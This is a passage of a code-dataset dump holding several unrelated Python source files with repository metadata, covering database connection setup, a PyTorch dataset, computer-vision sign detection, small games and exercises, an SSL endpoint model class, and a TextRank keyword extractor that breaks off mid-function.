\"\"\"Load config object for workers.\n\n Look the environment variable called `WORKER_CONFIG`. If present\n load the python file else look for `prod.py`, `dev.py` in the order.\n If both are missing quit.\n\n `WORKER_CONFIG` can be of form `config/prod.py` or `config.prod.py`.\n \"\"\"\n path = os.environ.get('WORKER_CONFIG')\n if not path:\n path = _get_default_config_path()\n\n mod_name, file_ext = os.path.splitext(os.path.split(path)[-1])\n config = imp.load_source(mod_name, path)\n return config\n\ndef _set_env_vars(config):\n for k, v in config.__dict__.items():\n if isinstance(v, (int, basestring)):\n os.environ[k] = unicode(v)\n\ndef _setup_cassandra(hosts, keyspace):\n \"\"\"Setup connection to cassandra nodes.\n\n This function needs to be called before making any queries.\n\n :param hosts `list`: list of hosts to connect to.\n :param keyspace `unicode`: name of the keyspace to connect.\n \"\"\"\n if not isinstance(hosts, list):\n raise ValueError(\"hosts only accepts list of ips.\")\n connection.setup(hosts=hosts, default_keyspace=keyspace,\n protocol_version=3)\n\ndef setup_connections(config):\n \"\"\"Set connection to Cassandra\n \"\"\"\n keyspace = config.CASSANDRA_KEYSPACE\n hosts = config.CASSANDRA_HOSTS\n _setup_cassandra(hosts=hosts, keyspace=keyspace)\n _set_env_vars(config)\n sync_tables()\n\n\ndef get_redis_client(host='localhost', port=6379, db=0):\n \"\"\"Create Redis Client connection.\n \"\"\"\n host = os.environ.get('REDIS_HOST') or host\n port = os.environ.get('REDIS_PORT') or port\n return StrictRedis(host=host, port=port, db=db)\n\n\n# Helper methods for tests\ndef sync_tables():\n \"\"\"Sync all models to tables.\n \"\"\"\n sync_table(ShoppingList)\n sync_table(User)\n\ndef drop_tables():\n \"\"\"Drop all tables in the keyspace.\n\n Note: Use this with care!.\n \"\"\"\n drop_table(ShoppingList)\n drop_table(User)\n","repo_name":"ramaprv/flask-cassandra","sub_path":"app/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"14622711495","text":"from torch.utils.data import Dataset\r\nimport numpy as np\r\nimport os\r\nimport h5py\r\nimport torch\r\n\r\ndef remove_zero(data):\r\n idxs = []\r\n for i in range(len(data)):\r\n if data[i].mean() == 0.0:\r\n idxs.append(i)\r\n data = np.delete(data, idxs, 0)\r\n return data\r\n\r\nclass NumDataset(Dataset):\r\n\r\n def __init__(self, args):\r\n\r\n i = 0\r\n n = 0\r\n self.window_size = args.window_size\r\n results = []\r\n self.results2 = []\r\n self.labels = []\r\n print('hdf5 files preprocessing... start')\r\n for labelname in sorted(os.listdir(args.path)):\r\n for filename in sorted(os.listdir(args.path + labelname + '/')):\r\n print(n+1, labelname,'completed !')\r\n n = n + 1\r\n\r\n with h5py.File(args.path + labelname + '/' + filename, \"r\") as f:\r\n data = np.array(list(f[\"pressure\"]))\r\n data = remove_zero(data)\r\n length = len(data)\r\n\r\n data = data.reshape(length, -1)\r\n\r\n for a in range(length - args.window_size):\r\n self.results2.append(data[a:a + args.window_size, :])\r\n self.labels.append(i)\r\n\r\n results.append(data)\r\n\r\n i = i + 1\r\n\r\n self.results2 = torch.tensor(self.results2)\r\n print('hdf5 files preprocessing... end')\r\n self.labels = torch.tensor(self.labels)\r\n\r\n def __len__(self):\r\n num_of_idx = len(self.results2) - self.window_size\r\n return num_of_idx\r\n\r\n def __getitem__(self, idx):\r\n idx = idx + 1\r\n X = self.results2[idx]\r\n y = self.labels[idx]\r\n\r\n return X, y","repo_name":"stan5dard/FootGesture","sub_path":"carpet_dataset.py","file_name":"carpet_dataset.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34516975125","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\n\n\n# Create your views here.\n# 定义home方法,用来做为首页\ndef home(req):\n Url = 'http://' + req.get_host() + req.path\n \n text = '你好:游客!|登录'\n username = req.COOKIES.get('username', '')\n if username != '':\n text = '你好:{0} | 注销'.format(username)\n \n res = HttpResponse(text) \n res.set_cookie('jump_url', Url, 3600)\n \n return res # 先试试输出效果\n \n # req.set_cookie('host',Url,3600)\n","repo_name":"lrbmx/xb_blog","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14532741675","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport cv2\nimport numpy as np\nfrom tqdm import *\n\ndef show(res,name,K=5.0):\n\tres = (res-res.min())/(res.max()-res.min())\n\tres = torch.clamp(res,0.0,1.0/K)*K\n\tres = res[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\tcv2.imshow(name,res.astype(np.uint8))\n\t\t\n\nclass Dewarp(nn.Module):\n\tdef __init__(self,maxDist = 7):\n\t\tsuper(Dewarp,self).__init__()\n\t\tself.maxDist = maxDist\n\t\tself.ks = 11\n\t\n\tdef forward(self,A,B):\n\t\tD = self.maxDist\n\t\tA_pad = F.pad(A,[D,D,D,D])\n\t\tcx,cy = D,D\n\t\t_,_,H,W = B.size()\t#A.size()==B.size()\n\t\tres = None\n\t\tweight_ = None\n\t\tfor dx in tqdm(range(-D+1,D)):\n\t\t\tfor dy in range(-D+1,D):\n\t\t\t\tpx,py = cx+dx,cy+dy\n\t\t\t\ttmpRes = torch.norm(A_pad[:,:,py:py+H,px:px+W]-B,p=2,dim=1).unsqueeze(1)\n\t\t\t\tweight = F.avg_pool2d(tmpRes, self.ks, stride=1, padding=self.ks//2)\n\t\t\t\t#tmpRes = weight * tmpRes\n\t\t\t\tif weight_ is None or res is None:\n\t\t\t\t\tweight_ = weight\n\t\t\t\t\tres = tmpRes\n\t\t\t\telse:\n\t\t\t\t\tmask = weight_ >= weight \n\t\t\t\t\tmask_ = weight[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\t\t\t\t\t#cv2.imshow('mask',mask_.astype(np.uint8))\n\t\t\t\t\t\n\t\t\t\t\tres[mask] = tmpRes[mask]\n\t\t\t\t\tweight_[mask] = weight[mask]\n\t\t\t\tres = res.detach()\n\t\t\t\tres_ = (res-res.min())/(res.max()-res.min())\n\t\t\t\ttmpRes= (tmpRes-tmpRes.min())/(tmpRes.max()-tmpRes.min())\n\t\t\t\tres_ = res_[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\t\t\t\ttmpRes = tmpRes[0,:,:,:].cpu().permute(1,2,0).numpy()*255\n\t\t\t\tcv2.imshow('Nowres',res_.astype(np.uint8))\n\t\t\t\tcv2.imshow('Tmpres',tmpRes.astype(np.uint8))\n\t\t\t\tcv2.waitKey(-1)\n\t\t\t\tweight_ = weight_.detach()\n\t\tres = F.max_pool2d(-res, 3, stride=1, padding=1)\n\t\tres = -res\n\t\t#return torch.mean(torch.abs(A-B),dim=1).unsqueeze(1)\n\t\t#return torch.norm(A-B,p=2,dim=1).unsqueeze(1)\n\t\treturn res\n\nif __name__ == '__main__':\n\tA = cv2.imread('A2.jpg').astype(np.float32)\n\tB = cv2.imread('B2.jpg').astype(np.float32)\n\t#cv2.imshow('A',A.astype(np.uint8))\n\t#cv2.imshow('B',B.astype(np.uint8))\n\tA = torch.from_numpy(A).permute(2,0,1)/255.0\n\tB = torch.from_numpy(B).permute(2,0,1)/255.0\n\tA = A.unsqueeze(0).float()\n\tB = B.unsqueeze(0).float()\n\n\tmodel = Dewarp(7)\n\tres = model(B,A)\n\tshow(res,'res')\n\tcv2.waitKey(-1)\n\n\n\n\n","repo_name":"bj80heyue/PCB_Defect_Detection_GUI","sub_path":"data/dewarp.py","file_name":"dewarp.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"10531423245","text":"import cv2\nimport time\n\n# Stop Sign Cascade Classifier xml\nstop_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_stop_sign.xml')\n# No entry Sign Cascade Classifier xml\nno_entry_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_no_entry_sign.xml')\n# Stop Sign Cascade Classifier xml\nyield_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_yield_sign_v2.xml')\n# One way Sign Cascade Classifier xml\none_way_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_one_way_sign.xml')\n# Parking Sign Cascade Classifier xml\nparking_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_park2.xml')\n# Crosswalk Sign Cascade Classifier xml\ncrosswalk_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_crosswalk_sign_v2.xml')\n# Roundabout Sign Cascade Classifier xml\nroundabout_sign = cv2.CascadeClassifier('cascade_classifiers/cascade_v1.xml')\n\ncap = cv2.VideoCapture(0)\n#cap.set(4, 480)\n#cap.set(3, 360)term\n#time.sleep(5)\n\nwhile cap.isOpened():\n _, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n stop_sign_scaled = stop_sign.detectMultiScale(gray, 1.3, 5)\n no_entry_sign_scaled = no_entry_sign.detectMultiScale(gray, 1.2, 5)\n yield_sign_scaled = yield_sign.detectMultiScale(gray, 1.2, 5)\n one_way_sign_scaled = one_way_sign.detectMultiScale(gray, 1.3, 5)\n parking_sign_scaled = parking_sign.detectMultiScale(gray, 1.3, 5)\n crosswalk_sign_scaled = crosswalk_sign.detectMultiScale(gray, 1.2, 5)\n round_sign_scaled = roundabout_sign.detectMultiScale(gray, 1.3, 5)\n\n # # Detect the stop sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in stop_sign_scaled:\n # # Draw rectangle around the stop sign\n # stop_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Stop Sign\" on bottom of rectangle\n # stop_sign_text = cv2.putText(img=stop_sign_rectangle, text=\"Stop Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n\n # # Detect the no entry sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in no_entry_sign_scaled:\n # # Draw rectangle around the no entry sign\n # no_entry_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"No entry Sign\" on bottom of rectangle\n # no_entry_sign_text = cv2.putText(img=no_entry_sign_rectangle, text=\"No entry Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # Detect the yield sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in yield_sign_scaled:\n # # Draw rectangle around the yield sign\n # yield_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Yield Sign\" on bottom of rectangle\n # yield_sign_text = cv2.putText(img=yield_sign_rectangle, text=\"Yield Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # # Detect the one_way sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in one_way_sign_scaled:\n # # Draw rectangle around the one way sign\n # one_way_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Onw waySign\" on bottom of rectangle\n # one_way_sign_text = cv2.putText(img=one_way_sign_rectangle, text=\"One way Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # # Detect the parking sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in parking_sign_scaled:\n # # Draw rectangle around the parking sign\n # parking_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Parking\" on bottom of rectangle\n # parking_sign_text = cv2.putText(img=parking_sign_rectangle, text=\"Parking Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n #\n # # Detect the crosswalk sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n # for (x,y,w,h) in crosswalk_sign_scaled:\n # # Draw rectangle around the crosswalk sign\n # crosswalk_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # # Write \"Crosswalk\" on bottom of rectangle\n # crosswalk_sign_text = cv2.putText(img=crosswalk_sign_rectangle, text=\"Crosswalk Sign\", org=(x, y+h+30),\n # fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n # color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n #\n # Detect the crosswalk sign, x,y = origin points, w = width, h = height (w, h = bottom right corner)\n for (x,y,w,h) in round_sign_scaled:\n # Draw rectangle around the crosswalk sign\n round_sign_rectangle = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\n # Write \"Crosswalk\" on bottom of rectangle\n round_sign_text = cv2.putText(img=round_sign_rectangle, text=\"Roundabout Sign\", org=(x, y+h+30),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=1,\n color=(0,0,255), thickness=2, lineType=cv2.LINE_4)\n\n cv2.imshow(\"img\", img)\n\n key = cv2.waitKey(30)\n if key == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n break","repo_name":"EshginGuluzade/bfmc_private","sub_path":"detection2.py","file_name":"detection2.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34409310470","text":"def anpai():\n weekday = { }#定义一个空的字典\n while 1:\n ifend = input(\"【输入【1】选择周末安排,输入【0】退出程序:】\\n\")\n if ifend == '1':\n print(\"【请开始规划你们的周末吧:】\\n\")\n else:\n return \n\n\n print(\"--------------安排周六--------------\\n\")\n yueliupengfei = input(\"【这周是否约刘鹏飞:】\\n(如果是输入1,否则0)\\n\")\n\n if yueliupengfei == '1':\n weekday[\"周六:\"] = \"和小刘小两口约起来!\"\n print(\"周六:和小刘小两口约起来!\\n\")\n elif yueliupengfei == '0':\n weekday[\"周六:\"] = \"周六俩人待家里\"\n print(\"周六:俩人待家里\\n\")\n\n print(\"--------------安排周天--------------\\n\")\n\n yuepengyou = input(\"【沙酱是否约朋友:】\\n(如果是输入1,否则0)\\n\")\n\n if yuepengyou == '1':\n weekday[\"周日:\"] = \"沙酱找朋友玩,栋酱回学校!\"\n print(\"周日:沙酱找朋友玩,栋酱回学校!\\n\")\n elif yuepengyou == '0':\n weekday[\"周日:\"] = \"周六俩人待家里!\"\n print(\"周日:周六俩人待家里!\\n\")\n \n\n #输出字典,将周末的安排一起输入\n staday = \"周六\" + weekday[\"周六:\"] + \"\\n\"\n sunday = \"周日\" + weekday[\"周日:\"] + \"\\n\"\n print(\"------------周末安排总结------------\\n\")\n print(staday)\n print(sunday)\n \n\nprint(\"开启沙酱和栋酱的周末之旅吧!!!\\n\")\nprint(\"--------------------------------------\\n\")\nanpai()","repo_name":"ADdongdong/08_CPP_and_C_project","sub_path":"01_Linux/21_process/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73423584392","text":"import datetime\nfrom typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\nfrom dateutil.parser import isoparse\n\nfrom ..models.models_ssl_endpoint_history_response_certificate_model import (\n ModelsSSLEndpointHistoryResponseCertificateModel,\n)\nfrom ..models.models_ssl_endpoint_history_response_job_type import ModelsSSLEndpointHistoryResponseJobType\nfrom ..models.models_ssl_endpoint_history_response_probe_type import ModelsSSLEndpointHistoryResponseProbeType\nfrom ..models.models_ssl_endpoint_history_response_status import ModelsSSLEndpointHistoryResponseStatus\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"ModelsSSLEndpointHistoryResponse\")\n\n\n@attr.s(auto_attribs=True)\nclass ModelsSSLEndpointHistoryResponse:\n \"\"\"\n Attributes:\n history_id (Union[Unset, str]): Example: 00000000-0000-0000-0000-000000000000.\n endpoint_id (Union[Unset, str]): Example: 00000000-0000-0000-0000-000000000000.\n audit_id (Union[Unset, int]):\n timestamp (Union[Unset, datetime.datetime]):\n status (Union[Unset, ModelsSSLEndpointHistoryResponseStatus]):\n job_type (Union[Unset, ModelsSSLEndpointHistoryResponseJobType]):\n probe_type (Union[Unset, ModelsSSLEndpointHistoryResponseProbeType]):\n reverse_dns (Union[Unset, str]):\n history_certificates (Union[Unset, List[ModelsSSLEndpointHistoryResponseCertificateModel]]):\n \"\"\"\n\n history_id: Union[Unset, str] = UNSET\n endpoint_id: Union[Unset, str] = UNSET\n audit_id: Union[Unset, int] = UNSET\n timestamp: Union[Unset, datetime.datetime] = UNSET\n status: Union[Unset, ModelsSSLEndpointHistoryResponseStatus] = UNSET\n job_type: Union[Unset, ModelsSSLEndpointHistoryResponseJobType] = UNSET\n probe_type: Union[Unset, ModelsSSLEndpointHistoryResponseProbeType] = UNSET\n reverse_dns: Union[Unset, str] = UNSET\n history_certificates: Union[Unset, List[ModelsSSLEndpointHistoryResponseCertificateModel]] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n history_id = self.history_id\n endpoint_id = self.endpoint_id\n audit_id = self.audit_id\n timestamp: Union[Unset, str] = UNSET\n if not isinstance(self.timestamp, Unset):\n timestamp = self.timestamp.isoformat()[:-6]+'Z'\n\n status: Union[Unset, int] = UNSET\n if not isinstance(self.status, Unset):\n status = self.status.value\n\n job_type: Union[Unset, int] = UNSET\n if not isinstance(self.job_type, Unset):\n job_type = self.job_type.value\n\n probe_type: Union[Unset, int] = UNSET\n if not isinstance(self.probe_type, Unset):\n probe_type = self.probe_type.value\n\n reverse_dns = self.reverse_dns\n history_certificates: Union[Unset, List[Dict[str, Any]]] = UNSET\n if not isinstance(self.history_certificates, Unset):\n history_certificates = []\n for history_certificates_item_data in self.history_certificates:\n history_certificates_item = history_certificates_item_data.to_dict()\n\n history_certificates.append(history_certificates_item)\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if history_id is not UNSET:\n field_dict[\"HistoryId\"] = history_id\n if endpoint_id is not UNSET:\n field_dict[\"EndpointId\"] = endpoint_id\n if audit_id is not UNSET:\n field_dict[\"AuditId\"] = audit_id\n if timestamp is not UNSET:\n field_dict[\"Timestamp\"] = timestamp\n if status is not UNSET:\n field_dict[\"Status\"] = status\n if job_type is not UNSET:\n field_dict[\"JobType\"] = job_type\n if probe_type is not UNSET:\n field_dict[\"ProbeType\"] = probe_type\n if reverse_dns is not UNSET:\n field_dict[\"ReverseDNS\"] = reverse_dns\n if history_certificates is not UNSET:\n field_dict[\"HistoryCertificates\"] = history_certificates\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n history_id = d.pop(\"HistoryId\", UNSET)\n\n endpoint_id = d.pop(\"EndpointId\", UNSET)\n\n audit_id = d.pop(\"AuditId\", UNSET)\n\n _timestamp = d.pop(\"Timestamp\", UNSET)\n timestamp: Union[Unset, datetime.datetime]\n if isinstance(_timestamp, Unset):\n timestamp = UNSET\n else:\n timestamp = isoparse(_timestamp)\n\n _status = d.pop(\"Status\", UNSET)\n status: Union[Unset, ModelsSSLEndpointHistoryResponseStatus]\n if isinstance(_status, Unset):\n status = UNSET\n else:\n status = ModelsSSLEndpointHistoryResponseStatus(_status)\n\n _job_type = d.pop(\"JobType\", UNSET)\n job_type: Union[Unset, ModelsSSLEndpointHistoryResponseJobType]\n if isinstance(_job_type, Unset):\n job_type = UNSET\n else:\n job_type = ModelsSSLEndpointHistoryResponseJobType(_job_type)\n\n _probe_type = d.pop(\"ProbeType\", UNSET)\n probe_type: Union[Unset, ModelsSSLEndpointHistoryResponseProbeType]\n if isinstance(_probe_type, Unset):\n probe_type = UNSET\n else:\n probe_type = ModelsSSLEndpointHistoryResponseProbeType(_probe_type)\n\n reverse_dns = d.pop(\"ReverseDNS\", UNSET)\n\n history_certificates = []\n _history_certificates = d.pop(\"HistoryCertificates\", UNSET)\n for history_certificates_item_data in _history_certificates or []:\n history_certificates_item = ModelsSSLEndpointHistoryResponseCertificateModel.from_dict(\n history_certificates_item_data\n )\n\n history_certificates.append(history_certificates_item)\n\n models_ssl_endpoint_history_response = cls(\n history_id=history_id,\n endpoint_id=endpoint_id,\n audit_id=audit_id,\n timestamp=timestamp,\n status=status,\n job_type=job_type,\n probe_type=probe_type,\n reverse_dns=reverse_dns,\n history_certificates=history_certificates,\n )\n\n models_ssl_endpoint_history_response.additional_properties = d\n return models_ssl_endpoint_history_response\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"Keyfactor/keyfactor-python-client-sdk","sub_path":"kfclient/keyfactor_v_1_client/models/models_ssl_endpoint_history_response.py","file_name":"models_ssl_endpoint_history_response.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"35745447020","text":"class Solution:\r\n def leastInterval(self, tasks: List[str], n: int) -> int:\r\n # time \r\n time = 0 \r\n queue = deque()\r\n count = Counter(tasks)\r\n t = [ -cnt for cnt in count.values()] \r\n heapq.heapify(t)\r\n\r\n while queue or t:\r\n time += 1\r\n\r\n if not t: # if heap is empty, set time to what needs to be processed next\r\n time = queue[0][1]\r\n\r\n else:\r\n cnt = heapq.heappop(t) + 1\r\n\r\n if cnt: # if the number is not 0, we can process it\r\n queue.append([cnt, n + time])\r\n \r\n if queue and queue[0][1] == time:\r\n heapq.heappush(t, queue.popleft()[0])\r\n\r\n return time\r\n # Time O(N * M) # Space O(N)","repo_name":"garysmith1933/NeetCodeRoadMap","sub_path":"Heaps/task_scheduler.py","file_name":"task_scheduler.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39760487036","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 11 13:57:36 2020\n\n@author: Diana McSpadden\n\"\"\"\n# import needed libraries\nimport time as t\nimport numpy as np\n\n# define timer value\nt0 = 0\n\ndef clearTimer():\n t0 = 0\n\n\ndef stopWatch(startOrStop):\n global t0\n \n if startOrStop == \"START\":\n # get the start time in seconds\n t0 = t.time()\n elif startOrStop == \"STOP\":\n # get the difference in time\n timerSeconds = t.time() - t0;\n # clear the timer\n clearTimer()\n \n return timerSeconds\n\n# clear t0\nclearTimer()\n\n# Now that I have the functions let's time kronecker multiplication\nx = np.arange(4).reshape(2, 2)\ny = np.arange(5, 9).reshape(2, 2)\nprint(x)\nprint(y)\n\n# start the timer and run multiplication\nstopWatch(\"START\")\nresult = np.kron(x, y)\n# stop the timer\nkronSeconds = stopWatch(\"STOP\")\n\nprint(result)\nprint(\"Kron multiplication of x and y took \", kronSeconds, \" seconds.\")\n \n \n \n \n\n \n ","repo_name":"hdmcspadden/UVaTechBootcamp","sub_path":"PythonExercises/PythonStopwatch.py","file_name":"PythonStopwatch.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"71563784392","text":"#!/usr/bin/env python3\nfrom ..intcode import Program\nimport itertools\nfrom os import path\n\n\nif __name__ == \"__main__\":\n filename = path.abspath(path.join(path.dirname(__file__), \"input.txt\"))\n p = Program(filename)\n for noun, verb in itertools.product(range(100), range(100)):\n print(f\"Running program with inputs {noun} and {verb}...\")\n if p.run(noun, verb) == 19690720:\n print(\"Success!\")\n exit(0)\n print(\"No match found\")\n","repo_name":"danapplegate/AdventOfCode2019","sub_path":"src/aoc2019/2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22817723787","text":"# 032 숫자 맞추기 게임\n# 난이도 1: 1~10, 2: 1~100, 3: 1~1000\n# 난이도를 입력받고 게임을 시작\n# 범위 내에서 무작위 숫자를 하나 선택 후\n# 맞추라고 출력\n# 플레이어가 맞는 숫자를 입력 할 때 마다,\n# 업다운 출력\n# 정답을 맞추면 몇번만에 맞췄는지 출력하고\n# 게임을 다시 할 것인지 묻는다.\nimport random\n\nimport math\n\nprint(\"Let's play Guess the Number.\")\ndifficulty = int(input(\"Enter the level of difficulty(1~3): \"))\n\nagain = \"y\"\nwhile again.__eq__(\"y\"):\n\tif 1 <= difficulty <= 3:\n\t\tlimit = pow(10, difficulty)\n\telse:\n\t\tprint(\"Wrong input\")\n\t\tbreak\n\n\trandomNumber = math.ceil(random.random() * limit) + 1\n\tc = 0\n\tguess = -1\n\n\twhile not guess == randomNumber:\n\t\tguess = int(input(\"I have my number. What's your guess? \"))\n\n\t\tif guess > randomNumber:\n\t\t\tc += 1\n\t\t\tprint(\"Too high! guess again.\")\n\t\telif guess < randomNumber:\n\t\t\tc += 1\n\t\t\tprint(\"Too low! guess again.\")\n\t\telif guess == randomNumber:\n\t\t\tc += 1\n\t\t\tprint(\"Correct! You got it in %d guesses.\" % c)\n\t\telse:\n\t\t\tprint(\"Wrong input\")\n\tagain = input(\"Play again?(y/n) \")\n","repo_name":"BackToTheSchool/assignment_hw","sub_path":"171108_Python/032.py","file_name":"032.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17865396124","text":"import logging\nimport re\nfrom dataclasses import asdict, dataclass\nfrom typing import Dict, List, Set, Union\n\nimport spacy\nfrom spacy.tokens import Doc, Span\n\nfrom cloud_worker.textrank_module.clustering import cluster_sentences\n\nfrom .nlp import (\n _decode_unicode,\n _remove_non_ascii,\n _remove_non_core_words,\n _remove_stopwords,\n _simple_tokenize,\n)\nfrom .pagerank import PageRank, Undirected_Node\n\n\"\"\"\nTextRank.keyword_extraction__undirected() - return a list of keywords from a string\n\"\"\"\n\nlog = logging.getLogger(__name__)\n\n@dataclass\nclass Keyword_Extraction_Result:\n nodes: List[Undirected_Node]\n\n\nclass Singleton(type):\n _instances = {}\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n \n\nclass TextRank(metaclass=Singleton):\n def __init__(self) -> None:\n log.info('loading spacy model...')\n self.nlp = spacy.load('en_core_web_lg') # generate a spacy natural language processing object\n \n def sentence_extraction__undirected(self, text: Union[str, List[str]], converge_val:float=0.01):\n if isinstance(text, str):\n text = _decode_unicode(text)\n text = _remove_non_ascii(text)\n nodes = [i.as_doc() for i in self.nlp(text).sents]\n \n elif isinstance(text, List):\n text = [_decode_unicode(i) for i in text]\n text = [_remove_non_ascii(i) for i in text]\n nodes = [self.nlp(i) for i in text]\n \n else: raise ValueError( f'expected str, instead got {type(text)}')\n \n nodes = self._generate_nodes_from_similarity(nodes)\n \n result = PageRank.calculate__undirected_no_optimise(nodes, converge_val=converge_val)\n \n sorted_result = sorted(result.items(), key=lambda x:x[1], reverse=True)\n result_nodes: List[dict] = []\n \n for node,score in sorted_result:\n # convert node to dict for serialization\n node_dict = node.asdict()\n node_dict['score'] = score\n result_nodes.append(node_dict)\n \n return result_nodes\n \n \n def keyword_extraction__undirected(self, string:str,\n converge_val:float=0.01,\n number_to_keep: int=0,\n pos_tags:List[str] = ['NOUN','ADJ', \n 'PROPN'\n # 'VERB','ADV'\n ],\n damping_factor=0.1,\n cooccurence_value=2\n ):\n \n number_to_keep = number_to_keep or len(string) // 3 # as defined in the paper\n log.debug([(i.text, i.pos_) for i in self.nlp(string)])\n filtered_text = _decode_unicode(string)\n filtered_text = _remove_non_ascii(filtered_text)\n filtered_text = ' '.join([i.text for i in self.nlp(string) if i.pos_ in pos_tags])\n filtered_text = _remove_stopwords(filtered_text)\n filtered_text = _simple_tokenize(filtered_text)\n if not any(filtered_text): return []\n \n nodes = self._generate_nodes_from_cooccurence(filtered_text, cooccurence_value)\n result = PageRank.calculate__undirected_no_optimise(nodes, converge_val=converge_val, random_surf_prob=damping_factor)\n \n sorted_result = sorted(result.items(), key=lambda x:x[1], reverse=True)\n sorted_result = sorted_result[:number_to_keep]\n \n result_nodes: List[Dict[str,float]] = []\n \n for node,score in sorted_result:\n # convert node to dict for serialization\n node_dict = node.asdict()\n node_dict['score'] = score\n result_nodes.append(node_dict)\n return result_nodes\n \n def _generate_nodes_from_similarity(self, sentences:List[Doc], threshold: float = 0.5):\n node_dict:Dict[str, Undirected_Node] = {}\n # helper function to get a Node from the dict or generate a new Node if one doesn't exist\n def get_from_node_dict(token_orth:str) -> Undirected_Node:\n if token_orth in node_dict: return node_dict[token_orth]\n else:\n node_dict[token_orth] = Undirected_Node(name=token_orth)\n return node_dict[token_orth]\n \n \n for idx, i in enumerate(sentences):\n 